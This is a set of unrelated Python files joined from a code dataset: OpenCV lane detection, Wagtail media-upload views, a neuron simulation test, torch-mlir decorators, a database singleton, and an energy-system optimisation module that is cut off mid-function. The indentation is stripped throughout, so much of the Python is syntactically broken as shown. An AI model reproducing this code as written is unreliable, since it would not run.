# Binarize the road image with Canny edge detection
road_edges = cv2.Canny(gray_road, 125, 200)
viewImage(road_edges)
# Find the cone in the original image via an HSV colour mask
cone_hsv = cv2.cvtColor(cone, cv2.COLOR_BGR2HSV)
lower_or = np.array([8, 100, 100])
upper_or = np.array([17, 255, 255])
mask = cv2.inRange(cone_hsv, lower_or, upper_or)
res = cv2.bitwise_and(cone_hsv, cone_hsv, mask=mask)
viewImage(mask)
#viewImage(res)
# Contours
contours, h = cv2.findContours(mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
cv2.drawContours(cone, contours, 2, (255, 0, 0), 5)
viewImage(cone)
contours, h = cv2.findContours(road_edges, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
print(len(contours))
# contours with indices 14 and 16 are the inner edges of the lane
cv2.drawContours(road, contours, -1, (255, 0, 0), 5)
viewImage(road)
| StarcoderdataPython |
1720078 | from __future__ import unicode_literals
import os
from django.shortcuts import get_object_or_404, redirect, render
from django.urls import reverse
from django.utils.translation import ugettext as _
from django.views.decorators.vary import vary_on_headers
from django.core.files import File
from wagtail import VERSION as WAGTAIL_VERSION
from wagtail.admin import messages
from wagtail.core.models import Collection
from wagtail.search.backends import get_search_backends
from .forms import get_media_form
from .models import get_media_model
from .permissions import permission_policy
from .utils import paginate, chunk_uploaded_file, upload_path
if WAGTAIL_VERSION < (2, 5):
from wagtail.admin.forms import SearchForm
else:
from wagtail.admin.forms.search import SearchForm
if WAGTAIL_VERSION < (2, 9):
from wagtail.admin.utils import PermissionPolicyChecker, permission_denied, popular_tags_for_model
else:
from wagtail.admin.auth import PermissionPolicyChecker, permission_denied
from wagtail.admin.models import popular_tags_for_model
permission_checker = PermissionPolicyChecker(permission_policy)
@permission_checker.require_any('add', 'change', 'delete')
@vary_on_headers('X-Requested-With')
def index(request):
Media = get_media_model()
# Get media files (filtered by user permission)
media = permission_policy.instances_user_has_any_permission_for(
request.user, ['change', 'delete']
)
# Ordering
if 'ordering' in request.GET and request.GET['ordering'] in ['title', '-created_at']:
ordering = request.GET['ordering']
else:
ordering = '-created_at'
media = media.order_by(ordering)
# Filter by collection
current_collection = None
collection_id = request.GET.get('collection_id')
if collection_id:
try:
current_collection = Collection.objects.get(id=collection_id)
media = media.filter(collection=current_collection)
except (ValueError, Collection.DoesNotExist):
pass
# Search
query_string = None
if 'q' in request.GET:
form = SearchForm(request.GET, placeholder=_("Search media files"))
if form.is_valid():
query_string = form.cleaned_data['q']
media = media.search(query_string)
else:
form = SearchForm(placeholder=_("Search media"))
# Pagination
paginator, media = paginate(request, media)
collections = permission_policy.collections_user_has_any_permission_for(
request.user, ['add', 'change']
)
if len(collections) < 2:
collections = None
# Create response
if request.is_ajax():
return render(request, 'chunked_media/media/results.html', {
'ordering': ordering,
'media_files': media,
'query_string': query_string,
'is_searching': bool(query_string),
})
else:
return render(request, 'chunked_media/media/index.html', {
'ordering': ordering,
'media_files': media,
'query_string': query_string,
'is_searching': bool(query_string),
'search_form': form,
'popular_tags': popular_tags_for_model(Media),
'user_can_add': permission_policy.user_has_permission(request.user, 'add'),
'collections': collections,
'current_collection': current_collection,
})
@permission_checker.require('add')
def add(request, media_type):
Media = get_media_model()
MediaForm = get_media_form(Media)
if request.POST:
media = Media(uploaded_by_user=request.user, type=media_type)
form = MediaForm(request.POST, request.FILES, instance=media, user=request.user)
if form.is_valid():
try:
messages.info(request, _(f"'{media.title.capitalize()}' is being processed"))
chunk_upload_path = upload_path(media.title)
messages.info(request, _(f"chunk_upload_path = '{chunk_upload_path}'"))
uploaded_file = chunk_uploaded_file(request.FILES['file'], media.filename, chunk_upload_path)
print(f'after uploaded file. uploaded_file Var is {uploaded_file}')
# May need to make the chunk uploaded file method save into an intermediary model for this to work
form.instance.file = File(uploaded_file, os.path.basename(uploaded_file.path))
print('after form.instance.file. Above form.save. About to form.save()')
form.save()
print('form saved!')
# Ensure the uploaded_file is closed because calling save() will open the file and read its content.
uploaded_file.close()
uploaded_file.delete()
# Reindex the media entry to make sure all tags are indexed
for backend in get_search_backends():
backend.add(media)
messages.success(request, _(f"'{media.title.capitalize()}' successfully uploaded!."), buttons=[
messages.button(reverse('chunked_media:index'), _('Index'))
])
return redirect('chunked_media:index')
except Exception as e:
messages.error(request, _(f"{media.title} could not be saved due to: {e}."))
else:
messages.error(request, _("The media file could not be saved due to errors."))
else:
media = Media(uploaded_by_user=request.user, type=media_type)
form = MediaForm(user=request.user, instance=media)
return render(request, "chunked_media/media/add.html", {
'form': form,
'media_type': media_type,
})
@permission_checker.require('change')
def edit(request, media_id):
Media = get_media_model()
MediaForm = get_media_form(Media)
media = get_object_or_404(Media, id=media_id)
if not permission_policy.user_has_permission_for_instance(request.user, 'change', media):
return permission_denied(request)
if request.POST:
original_file = media.file
form = MediaForm(request.POST, request.FILES, instance=media, user=request.user)
if form.is_valid():
if 'file' in form.changed_data:
# if providing a new media file, delete the old one.
# NB Doing this via original_file.delete() clears the file field,
# which definitely isn't what we want...
original_file.storage.delete(original_file.name)
messages.info(request, _(f"'{media.title.capitalize()}' is being processed"))
chunk_upload_path = upload_path(media.title)
uploaded_file = chunk_uploaded_file(request.FILES['file'], media.filename, chunk_upload_path)
# May need to make the chunk uploaded file method save into an intermediary model for this to work
form.instance.file = File(uploaded_file, os.path.basename(uploaded_file.path))
form.save()
# Ensure the uploaded_file is closed because calling save() will open the file and read its content.
uploaded_file.close()
uploaded_file.delete()
# media = save_final_media_to_model(chunk_uploaded_file(request.FILES['file'],
# media.filename,
# chunk_upload_path))
# Reindex the media entry to make sure all tags are indexed
for backend in get_search_backends():
backend.add(media)
messages.success(request, _(f"{media.title.capitalize()} updated"), buttons=[
messages.button(reverse('chunked_media:edit', args=(media.id,)), _('Edit'))
])
return redirect('chunked_media:index')
else:
messages.error(request, _("The media could not be saved due to errors."))
else:
form = MediaForm(instance=media, user=request.user)
filesize = None
# Get file size when there is a file associated with the Media object
if media.file:
try:
filesize = media.file.size
except OSError:
# File doesn't exist
pass
if not filesize:
messages.error(
request,
_("The file could not be found. Please change the source or delete the media file"),
buttons=[messages.button(reverse('chunked_media:delete', args=(media.id,)), _('Delete'))]
)
return render(request, "chunked_media/media/edit.html", {
'media': media,
'filesize': filesize,
'form': form,
'user_can_delete': permission_policy.user_has_permission_for_instance(
request.user, 'delete', media
),
})
@permission_checker.require('delete')
def delete(request, media_id):
Media = get_media_model()
media = get_object_or_404(Media, id=media_id)
if not permission_policy.user_has_permission_for_instance(request.user, 'delete', media):
return permission_denied(request)
if request.POST:
media.delete()
messages.success(request, _(f"{media.title.capitalize()} deleted."))
return redirect('chunked_media:index')
return render(request, "chunked_media/media/confirm_delete.html", {
'media': media,
})
def usage(request, media_id):
Media = get_media_model()
media = get_object_or_404(Media, id=media_id)
paginator, used_by = paginate(request, media.get_usage())
return render(request, "chunked_media/media/usage.html", {
'media': media,
'used_by': used_by
})
| StarcoderdataPython |
3292500 | <reponame>DerekYJC/bmi_python<gh_stars>0
#!/usr/bin/python
'''
Test case for PPFDecoder
'''
import numpy as np
from scipy.io import loadmat, savemat
import utils
from riglib.bmi import sim_neurons
import imp
imp.reload(sim_neurons)
kin_data = loadmat('paco_hand_kin.mat')
hand_kin = kin_data['hand_kin']
hand_vel = hand_kin[2:4, :]
X = utils.mat.pad_ones(hand_vel, axis=0, pad_ind=0).T
X2 = utils.mat.pad_ones(hand_vel, axis=0, pad_ind=-1).T
C = 20
Delta = 0.005
baseline_hz = 10
baseline = np.log(baseline_hz)
max_speed = 0.3 # m/s
max_rate = 70 # hz
mod_depth = (np.log(max_rate)-np.log(baseline_hz))/max_speed
pref_angle_data = loadmat('preferred_angle_c50.mat')
pref_angles = pref_angle_data['preferred_angle'].ravel()
pref_angles = pref_angles[:C]
# Load MATLAB sim results for comparison
N = 168510
N = 10000
data = loadmat('sample_spikes_and_kinematics_%d.mat' % N)
spike_counts = data['spike_counts']
beta = data['beta']
X = utils.mat.pad_ones(data['hand_vel'], axis=0, pad_ind=0).T
dt = 0.005
N = data['hand_vel'].shape[1]
k = 0
spikes = np.zeros([N, C])
## for k in range(C):
## tau_samples = data['tau_samples'][0][k].ravel().tolist()
## point_proc = sim_neurons.PointProcess(beta[:,k], dt, tau_samples=tau_samples)
## spikes[:,k] = point_proc.sim_batch(X[0:N, :])
##
## matching = np.array_equal(spike_counts[:,k], spikes[:,k])
## print k, matching
init_state = X[0,:]
tau_samples = [data['tau_samples'][0][k].ravel().tolist() for k in range(C)]
ensemble = sim_neurons.PointProcessEnsemble(beta, init_state, dt, tau_samples=tau_samples)
spikes_ensemble = np.zeros([N, C])
for n in range(1, N):
spikes_ensemble[n-1, :] = ensemble(X[n,:])
print(np.array_equal(spikes_ensemble, spike_counts))
| StarcoderdataPython |
1694558 | # Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
# See https://llvm.org/LICENSE.txt for license information.
# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
# Also available under a BSD-style license. See LICENSE.
from typing import List, Optional, Tuple, NamedTuple
import torch
# Decorators
# Currently, these decorators are very low-level and map 1:1 with
# methods on `torch_mlir.ClassAnnotator`. Eventually, we expect there to
# be a more elaborate Python layer which allows all the different annotations
# to be expressed conveniently and gives clearer error reports when
# the annotations aren't acceptable.
# This module is kept separate from torch_mlir.torchscript_annotations so that
# we can use this from code without C++ dependencies, which prevent us from
# interfacing the test framework across environments.
# Attribute names used for annotations.
# These should be kept in sync with their use in
# `torch_mlir/torchscript_annotations.py`.
TORCH_MLIR_EXPORT_ATTR_NAME = '_torch_mlir_export'
TORCH_MLIR_ARG_ANNOTATIONS_ATTR_NAME = '_torch_mlir_arg_annotations'
def export(fn):
"""Decorator that tells the torch-mlir compiler that a method is exported.
By default, no methods are exported, which is very important for
the compiler, because otherwise most Torch programs consist of a sea
of tiny exported functions with no rank or dtype information
(see `annotate_args`), which the compiler cannot do much with.
Note that this is different from `torch.jit.export`, which controls
which methods are scripted in the first place. For non-`forward` methods,
using this decorator usually means you also need `torch.jit.export`.
Conceptually, this decorator is annotating the scripted module, but is
applied to the original `torch.nn.Module` for convenience.
"""
setattr(fn, TORCH_MLIR_EXPORT_ATTR_NAME, True)
return fn
ArgAnnotation = Tuple[List[int], torch.dtype]
# TODO: Replace with py3 extended argument annotations when available.
# See https://www.python.org/dev/peps/pep-0593/
def annotate_args(annotations: List[Optional[ArgAnnotation]]):
"""Decorator that tells the torch-mlir compiler information about arguments.
The `annotations` should be a list of the same length as the number of
argument to the method (including `self`). Each list entry is either:
- None, corresponding to providing the compiler with no information.
- A 2-tuple consisting of a shape and a dtype, such as
`([2, 3, 4], torch.float32)`. A dimension with an unknown size can be
indicated by using `-1` as the size. This provides the compiler a
guarantee that the argument will always dynamically have the described
shape and dtype.
"""
# TODO: Check the number of arguments matches the number of arg annotations.
def decorator(fn):
setattr(fn, TORCH_MLIR_ARG_ANNOTATIONS_ATTR_NAME, annotations)
return fn
return decorator
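# A minimal usage sketch (illustrative only; the class name and shapes below are made up,
# not taken from the torch-mlir test suite). It shows `export` marking a method as visible
# to the compiler and `annotate_args` supplying shape/dtype guarantees, with -1 marking a
# dynamic dimension.
class _ExampleMatmulModule(torch.nn.Module):
    @export
    @annotate_args([
        None,                        # `self` carries no annotation
        ([-1, 4], torch.float32),    # lhs: dynamic row count, 4 columns
        ([4, -1], torch.float32),    # rhs: 4 rows, dynamic column count
    ])
    def forward(self, lhs, rhs):
        return torch.mm(lhs, rhs)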
| StarcoderdataPython |
3347496 | from python_library.src.custom_sqlalchemy.database import db
from python_library.src.custom_sqlalchemy.database import engine
from python_library.src.custom_sqlalchemy.database import session
class db_manager:
"""
    Database manager class (intended to be used as a singleton)
"""
__instance = None
def __new__(cls, *args, **kwargs):
"""
        Before creating a new class instance, check whether one has already been created, to guarantee the singleton property
"""
if cls.__instance is None:
cls.__instance = super(db_manager, cls).__new__(cls)
cls.__instance.__db_instance = db
cls.__instance.__session = session
cls.__instance.__cursor = engine.raw_connection().cursor()
return cls.__instance
def get_db_instance(self):
return self.__db_instance
def get_session(self):
return self.__session
def get_cursor(self):
return self.__cursor
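# Illustrative usage (shown as a comment because constructing the manager touches the real
# SQLAlchemy session): every construction returns the same instance, so the session and
# cursor are shared across the application.
#
#     manager_a = db_manager()
#     manager_b = db_manager()
#     assert manager_a is manager_b
#     session = manager_a.get_session()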
| StarcoderdataPython |
1798837 | <filename>Math_Apps/Leibnitz_sector_formula/leibnitz_settings.py
__author__ = 'benjamin'
# general settings
# visu
x_min_view = -1
x_max_view = 3
y_min_view = -2
y_max_view = 2
# control degree
t_value_min = 0
t_value_max = 1
t_value_step = .01
t_value_init = 0
resolution = 100
sample_curve_names = [
("circle", "circle"),
("shifted circle", "shift_circle"),
("cardioid", "cardioid"),
("cycloid", "cycloid")
]
sample_curves = {
"circle": ("sin(2*pi*t)", "cos(2*pi*t)"),
"shift_circle": ("1+sin(2*pi*t)", "1+cos(2*pi*t)"),
"cardioid": ("cos(2*pi*t)*(1+cos(2*pi*t))", "sin(2*pi*t)*(1+cos(2*pi*t))"),
"cycloid": ("1/5*(8*pi*t-sin(8*pi*t))", "1/5*(1-cos(8*pi*t))")
}
# function input
x_component_input_msg = sample_curves["cardioid"][0]
y_component_input_msg = sample_curves["cardioid"][1]
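# Illustrative sketch (not used by the app itself) of sampling one of the curves
# numerically; the cardioid expressions above are written out directly with numpy here,
# assuming the expression strings are parsed elsewhere in the application.
#
#     import numpy as np
#     t = np.linspace(t_value_min, t_value_max, resolution)
#     x = np.cos(2 * np.pi * t) * (1 + np.cos(2 * np.pi * t))
#     y = np.sin(2 * np.pi * t) * (1 + np.cos(2 * np.pi * t))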
| StarcoderdataPython |
116237 | <reponame>fnbillimoria/OPEN
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
OPEN Energy System Module.
The EnergySystem Class has two types of methods
i) energy management system (EMS) methods which implement algorithms to
calculate Asset control references, and
ii) simulation methods which call an EMS method to obtain control
references for Asset objects, update the state of Asset objects by calling
their update_control method and update the state of the Network by calling
its power flow method.
An EnergySystem has two separate time series, one for the EMS, and the
other for simulation.
OPEN includes two EMS methods for controllable Asset objects:
(i) one for multi-period optimisation
with a simple ‘copper plate’ network model, and
(ii) one for multi-period optimisation with a linear multi-phase
distribution network model which includes voltage and current flow
constraints.
OPEN has simulation methods for:
(i) open-loop optimisation, where the EMS method is run ahead of operation
to obtain controllable Asset references over the EMS time-series; and
(ii) for MPC, where the EMS method is implemented with a receding horizon
so that the flexible Asset references are updated at each step of the EMS
time series.
"""
#import modules
import copy
import pandas as pd
import pandapower as pp
import pandapower.networks as pn
import numpy as np
import picos as pic
import matplotlib.pyplot as plt
from System.Network_3ph_pf import Network_3ph
import cvxopt
__version__ = "1.0.2"
class EnergySystem:
"""
    Base Energy System Class
Parameters
----------
storage_assets : list of objects
Containing details of each storage asset
building_assets : list of objects
        Containing details of each building asset
nondispatch_assets : list of objects
        Containing details of each nondispatchable asset
network : object
Object containing information about the network
market : object
Object containing information about the market
dt_ems : float
EMS time interval duration (hours)
T_ems : int
Number of EMS time intervals
dt : float
time interval duration (hours)
T : int
number of time intervals
Returns
-------
EnergySystem
"""
def __init__(self, storage_assets, nondispatch_assets, network, market,
dt, T, dt_ems, T_ems, building_assets=[]):
self.storage_assets = storage_assets
self.building_assets = building_assets
self.nondispatch_assets = nondispatch_assets
self.network = network
self.market = market
self.dt_ems = dt_ems
self.T_ems = T_ems
self.dt = dt
self.T = T
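        # Illustrative sizing only (example numbers, not defaults): a one-day horizon could
        # use dt = 5/60 h with T = 288 simulation steps and dt_ems = 0.5 h with T_ems = 48
        # EMS steps, so each EMS interval spans dt_ems/dt = 6 simulation steps.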
#######################################
### Open Loop Control Methods
#######################################
def EMS_copper_plate(self):
"""
Energy management system optimization assuming all assets connected to
a single node.
Parameters
----------
self : EnergySystem object
Object containing information on assets, market, network and time
resolution.
Returns
-------
Output : dictionary
The following numpy.ndarrays are present depending upon asset mix:
P_ES_val : Charge/discharge power for storage assets (kW)
P_BLDG_val :Builfing power consumption (kW)
P_import_val :Power imported from central grid (kW)
P_export_val :Power exported to central grid (kW)
P_demand_val :System power demand at energy management time
resolution
"""
#setup and run a basic energy optimisation
#(single copper plate network model)
#######################################
### STEP 0: setup variables
#######################################
prob = pic.Problem()
N_ES = len(self.storage_assets)
N_BLDG = len(self.building_assets)
N_INDEPENDENT = N_ES + N_BLDG
N_nondispatch = len(self.nondispatch_assets)
P_demand_actual = np.zeros(self.T)
P_demand = np.zeros(self.T_ems)
for i in range(N_nondispatch):
P_demand_actual += self.nondispatch_assets[i].Pnet
#convert P_demand_actual to EMS time series scale
for t_ems in range(self.T_ems):
t_indexes = (t_ems*self.dt_ems/self.dt\
+ np.arange(0,self.dt_ems/self.dt)).astype(int)
P_demand[t_ems] = np.mean(P_demand_actual[t_indexes])
#######################################
### STEP 1: set up decision variables
#######################################
#controllable asset input powers
P_ctrl_asset = prob.add_variable('P_ctrl_asset',(self.T_ems,\
N_INDEPENDENT),\
vtype='continuous')
if N_BLDG > 0:
# cooling power
P_cooling = prob.add_variable('P_cooling',(self.T_ems,N_BLDG),\
vtype='continuous')
# heating power
P_heating = prob.add_variable('P_heating',(self.T_ems,N_BLDG),\
vtype='continuous')
# internal temperature
T_bldg = prob.add_variable('T_bldg',(self.T_ems,N_BLDG),\
vtype='continuous')
#(positive) net power imports
P_import = prob.add_variable('P_import',(self.T_ems,1),\
vtype='continuous')
#(positive) net power exports
P_export = prob.add_variable('P_export',(self.T_ems,1),\
vtype='continuous')
#(positive) maximum demand dummy variable
P_max_demand = prob.add_variable('P_max_demand',1,\
vtype='continuous')
#######################################
### STEP 2: set up constraints
#######################################
Asum_np = np.tril(np.ones([self.T_ems,self.T_ems])).astype('double')
#lower triangle matrix summing powers
Asum = pic.new_param('Asum',Asum_np)
        #building thermal model constraints
for i in range(N_BLDG):
#maximum heating constraint
prob.add_constraint(P_heating[:,i] <= self.building_assets[i].Hmax)
#maximum cooling constraint
prob.add_constraint(P_cooling[:,i] <= self.building_assets[i].Cmax)
#minimum heating constraint
prob.add_constraint(P_heating[:,i] >= 0)
#minimum cooling constraint
prob.add_constraint(P_cooling[:,i] >= 0)
#maximum temperature constraint
prob.add_constraint(T_bldg[:,i] <= self.building_assets[i].Tmax)
#minimum temperature constraint
prob.add_constraint(T_bldg[:,i] >= self.building_assets[i].Tmin)
#power consumption is the sum of heating and cooling
prob.add_constraint(P_ctrl_asset[:,i] == P_cooling[:,i]\
+ P_heating[:,i])
for t in range(self.T_ems):
if t == 0:
# initial temperature constraint
prob.add_constraint(T_bldg[t,i] ==\
self.building_assets[i].T0)
else:
# Inside temperature is a function of heating/cooling and
# outside temperature. Alpha, beta and gamma are parameters
# derived from the R and C values of the building.
# Relation between alpha, beta, gamma, R and C can be found
# in the BuildingAsset class in the Assets.py file
prob.add_constraint(T_bldg[t,i] ==\
self.building_assets[i].\
alpha*T_bldg[t-1,i] \
- self.building_assets[i].\
beta*P_cooling[t-1,i] \
+ self.building_assets[i].\
beta*self.building_assets[i].\
CoP*P_heating[t-1,i] \
+ self.building_assets[i].\
gamma*self.building_assets[i].\
Ta[t-1])
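        # Added note (an assumption for orientation, not taken from BuildingAsset): for a
        # first-order R-C building model a common discretisation is
        #     alpha = 1 - dt_ems/(R*C),   beta = dt_ems/C,   gamma = dt_ems/(R*C)
        # so that with no heating or cooling the indoor temperature relaxes towards Ta.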
#linear battery model constraints
for i in range(N_ES):
#maximum power constraint
prob.add_constraint(P_ctrl_asset[:,N_BLDG+i] <=\
self.storage_assets[i].Pmax)
#minimum power constraint
prob.add_constraint(P_ctrl_asset[:,N_BLDG+i] >=\
self.storage_assets[i].Pmin)
#maximum energy constraint
prob.add_constraint(self.dt_ems*Asum*P_ctrl_asset[:,N_BLDG+i] <=\
self.storage_assets[i].Emax\
-self.storage_assets[i].E0)
#minimum energy constraint
prob.add_constraint(self.dt_ems*Asum*P_ctrl_asset[:,N_BLDG+i] >=\
self.storage_assets[i].Emin\
-self.storage_assets[i].E0)
#final energy constraint
prob.add_constraint(self.dt_ems*Asum[self.T_ems-1,:]\
*P_ctrl_asset[:,N_BLDG+i] ==\
self.storage_assets[i].ET\
-self.storage_assets[i].E0)
#import/export constraints
for t in range(self.T_ems):
# power balance
prob.add_constraint(sum(P_ctrl_asset[t,:]) + P_demand[t] ==\
P_import[t]-P_export[t])
            #maximum import constraint
            prob.add_constraint(P_import[t] <= self.market.Pmax[t])
            #import non-negativity constraint
            prob.add_constraint(P_import[t] >= 0)
            #maximum export constraint
            prob.add_constraint(P_export[t] <= -self.market.Pmin[t])
            #export non-negativity constraint
            prob.add_constraint(P_export[t] >= 0)
#maximum demand dummy variable constraint
prob.add_constraint(P_max_demand >= P_import[t]-P_export[t])
if self.market.FR_window is not None:
FR_window = self.market.FR_window
FR_SoC_max = self.market.FR_SOC_max
FR_SoC_min = self.market.FR_SOC_min
for t in range(self.T_ems):
                if FR_window[t] == 1:
                    for i in range(N_ES):
                        # FR window: stored energy must stay below the maximum FR state of charge
prob.add_constraint(self.dt_ems
* Asum[t,:]
* P_ctrl_asset[:,N_BLDG+i]
<= (FR_SoC_max
* self.storage_assets[i].Emax)
- self.storage_assets[i].E0)
                        # FR window: stored energy must stay above the minimum FR state of charge
prob.add_constraint(self.dt_ems
* Asum[t,:]
* P_ctrl_asset[:,N_BLDG+i]
>= (FR_SoC_min
* self.storage_assets[i].Emax)
- self.storage_assets[i].E0)
#######################################
### STEP 3: set up objective
#######################################
prob.set_objective('min',self.market.demand_charge*P_max_demand+\
sum(self.market.prices_import[t]*P_import[t]+\
-self.market.prices_export[t]*P_export[t]\
for t in range(self.T_ems)))
#######################################
### STEP 3: solve the optimisation
#######################################
print('*** SOLVING THE OPTIMISATION PROBLEM ***')
prob.solve(verbose = 0)
print('*** OPTIMISATION COMPLETE ***')
P_ctrl_asset_val = P_ctrl_asset.value
P_import_val = P_import.value
P_export_val = P_export.value
P_demand_val = P_demand
if N_BLDG > 0:
#Store internal temperature inside object
T_bldg_val = T_bldg.value
for b in range(N_BLDG):
self.building_assets[b].T_int = T_bldg_val[:,b]
if N_ES > 0 and N_BLDG > 0:
output = {'P_BLDG_val':P_ctrl_asset_val[:,:N_BLDG],\
'P_ES_val':P_ctrl_asset_val[:,N_BLDG:N_ES+N_BLDG],\
'P_import_val':P_import_val,\
'P_export_val':P_export_val,\
'P_demand_val':P_demand_val}
elif N_ES == 0 and N_BLDG > 0:
output = {'P_BLDG_val':P_ctrl_asset_val[:,:N_BLDG],\
'P_import_val':P_import_val,\
'P_export_val':P_export_val,\
'P_demand_val':P_demand_val}
elif N_ES > 0 and N_BLDG == 0:
output = {'P_ES_val':P_ctrl_asset_val[:,:N_ES],\
'P_import_val':P_import_val,\
'P_export_val':P_export_val,\
'P_demand_val':P_demand_val}
else:
raise ValueError('No dispatchable assets.')
return output
def simulate_network(self):
"""
Run the Energy Management System in open loop and simulate a pandapower
network.
Parameters
----------
self : EnergySystem object
Object containing information on assets, market, network and time
resolution.
Returns
-------
Output : dictionary
The following numpy.ndarrays are present depending upon asset mix:
buses_Vpu : Voltage magnitude at bus (V)
buses_Vang : Voltage angle at bus (rad)
buses_Pnet : Real power at bus (kW)
buses_Qnet : Reactive power at bus (kVAR)
Pnet_market : Real power seen by the market (kW)
Qnet_market : Reactive power seen by the market (kVAR)
P_ES_ems : Charge/discharge power for storage assets at energy
management time resolution (kW)
P_BLDG_ems : Building power consumption at energy management
time resolution (kW)
P_import_ems : Power imported from central grid at energy
management time resolution (kW)
P_export_ems : Power exported to central grid at energy
management time resolution (kW)
P_demand_ems : System power demand at energy management time
resolution (kW)
"""
#######################################
### STEP 1: solve the optimisation
#######################################
t0 = 0
output_ems = self.EMS_copper_plate()
N_ESs = len(self.storage_assets) #number of energy storage assets
N_BLDGs = len(self.building_assets) #number of buildings
N_nondispatch = len(self.nondispatch_assets) #number of non-dispatchable assets
P_import_ems = output_ems['P_import_val']
P_export_ems = output_ems['P_export_val']
if N_ESs > 0:
P_ES_ems = output_ems['P_ES_val']
if N_BLDGs > 0:
P_BLDG_ems = output_ems['P_BLDG_val']
P_demand_ems = output_ems['P_demand_val']
#convert P_ES and P_BLDG signals to system time-series scale
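# e.g. dt_ems = 0.5 h and dt = 1/12 h (5 min) gives 6 simulation steps
# per EMS interval, over which the EMS set-point is held constant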
if N_ESs > 0:
P_ESs = np.zeros([self.T,N_ESs])
for t in range(self.T):
t_ems = int(t/(self.dt_ems/self.dt))
P_ESs[t,:] = P_ES_ems[t_ems,:]
if N_BLDGs > 0:
P_BLDGs = np.zeros([self.T,N_BLDGs])
for t in range(self.T):
t_ems = int(t/(self.dt_ems/self.dt))
P_BLDGs[t,:] = P_BLDG_ems[t_ems,:]
#######################################
### STEP 2: update the controllable assets
#######################################
if N_ESs > 0:
for i in range(N_ESs):
self.storage_assets[i].update_control(P_ESs[:,i])
if N_BLDGs > 0:
for i in range(N_BLDGs):
self.building_assets[i].update_control(P_BLDGs[:,i])
#######################################
### STEP 3: simulate the network
#######################################
N_buses = self.network.bus['name'].size
P_demand_buses = np.zeros([self.T,N_buses])
Q_demand_buses = np.zeros([self.T,N_buses])
if N_ESs > 0:
#calculate the total real and reactive power demand at each bus
for i in range(N_ESs):
bus_id = self.storage_assets[i].bus_id
P_demand_buses[:,bus_id] += self.storage_assets[i].Pnet
Q_demand_buses[:,bus_id] += self.storage_assets[i].Qnet
if N_BLDGs > 0:
#calculate the total real and reactive power demand at each bus
for i in range(N_BLDGs):
bus_id = self.building_assets[i].bus_id
P_demand_buses[:,bus_id] += self.building_assets[i].Pnet
Q_demand_buses[:,bus_id] += self.building_assets[i].Qnet
for i in range(N_nondispatch):
bus_id = self.nondispatch_assets[i].bus_id
P_demand_buses[:,bus_id] += self.nondispatch_assets[i].Pnet
Q_demand_buses[:,bus_id] += self.nondispatch_assets[i].Qnet
buses_Vpu = np.zeros([self.T,N_buses])
buses_Vang = np.zeros([self.T,N_buses])
buses_Pnet = np.zeros([self.T,N_buses])
buses_Qnet = np.zeros([self.T,N_buses])
Pnet_market = np.zeros(self.T)
Qnet_market = np.zeros(self.T)
#print(P_demand_buses)
print('*** SIMULATING THE NETWORK ***')
for t in range(self.T):
#for each time interval:
#set up a copy of the network for simulation interval t
network_t = copy.deepcopy(self.network)
for bus_id in range(N_buses):
P_t = P_demand_buses[t,bus_id]
Q_t = Q_demand_buses[t,bus_id]
#add P,Q loads to the network copy
pp.create_load(network_t,bus_id,P_t/1e3,Q_t/1e3)
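# P_t, Q_t are in kW/kVAr; pandapower expects MW/MVAr, hence /1e3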
#run the power flow simulation
pp.runpp(network_t,max_iteration=100) # Newton-Raphson ("nr") power flow
if t % 100 == 0:
print('network sim complete for t = '\
+ str(t) + ' of ' + str(self.T))
Pnet_market[t] = network_t.res_ext_grid['p_mw'][0]*1e3
Qnet_market[t] = network_t.res_ext_grid['q_mvar'][0]*1e3
for bus_i in range(N_buses):
buses_Vpu[t,bus_i] = network_t.res_bus['vm_pu'][bus_i]
buses_Vang[t,bus_i] = network_t.res_bus['va_degree'][bus_i]
buses_Pnet[t,bus_i] = network_t.res_bus['p_mw'][bus_i]*1e3
buses_Qnet[t,bus_i] = network_t.res_bus['q_mvar'][bus_i]*1e3
print('*** NETWORK SIMULATION COMPLETE ***')
if N_ESs > 0 and N_BLDGs > 0:
output = {'buses_Vpu':buses_Vpu,\
'buses_Vang':buses_Vang,\
'buses_Pnet':buses_Pnet,\
'buses_Qnet':buses_Qnet,\
'Pnet_market':Pnet_market,\
'Qnet_market':Qnet_market,\
'P_ES_ems':P_ES_ems,\
'P_BLDG_ems':P_BLDG_ems,\
'P_import_ems':P_import_ems,\
'P_export_ems':P_export_ems,\
'P_demand_ems':P_demand_ems}
elif N_ESs == 0 and N_BLDGs > 0:
output = {'buses_Vpu':buses_Vpu,\
'buses_Vang':buses_Vang,\
'buses_Pnet':buses_Pnet,\
'buses_Qnet':buses_Qnet,\
'Pnet_market':Pnet_market,\
'Qnet_market':Qnet_market,\
'P_BLDG_ems':P_BLDG_ems,\
'P_import_ems':P_import_ems,\
'P_export_ems':P_export_ems,\
'P_demand_ems':P_demand_ems}
elif N_ESs > 0 and N_BLDGs == 0:
output = {'buses_Vpu':buses_Vpu,\
'buses_Vang':buses_Vang,\
'buses_Pnet':buses_Pnet,\
'buses_Qnet':buses_Qnet,\
'Pnet_market':Pnet_market,\
'Qnet_market':Qnet_market,\
'P_ES_ems':P_ES_ems,\
'P_import_ems':P_import_ems,\
'P_export_ems':P_export_ems,\
'P_demand_ems':P_demand_ems}
else:
raise ValueError('No dispatchable assets.')
return output
# NEEDED FOR OXEMF EV CASE STUDY
def simulate_network_3phPF(self, ems_type = '3ph',
i_unconstrained_lines=[],
v_unconstrained_buses = []):
"""
Run the Energy Management System in open loop and simulate an IEEE 13
bus network either copper plate or 3ph
Parameters
----------
self : EnergySystem object
Object containing information on assets, market, network and time
resolution.
ems_type : string
Identifies whether the system is copper plate or 3ph. Default 3ph
i_unconstrained_lines : list
List of network lines which have unconstrained current
v_unconstrained_buses : list
List of buses at which the voltage is not constrained
Returns
-------
Output : dictionary
PF_network_res : Network power flow results stored as a list of
objects
P_ES_ems : Charge/discharge power for storage assets at energy
management time resolution (kW)
P_import_ems :Power imported from central grid at energy
management time resolution (kW)
P_export_ems :Power exported to central grid at energy
management time resolution(kW)
P_demand_ems :System power demand at energy management time
resolution (kW)
"""
#######################################
### STEP 1: solve the optimisation
#######################################
t0 = 0
if ems_type == 'copper_plate':
output_ems = self.EMS_copper_plate_t0(t0)
else:
output_ems = self.EMS_3ph_linear_t0(t0,
i_unconstrained_lines,
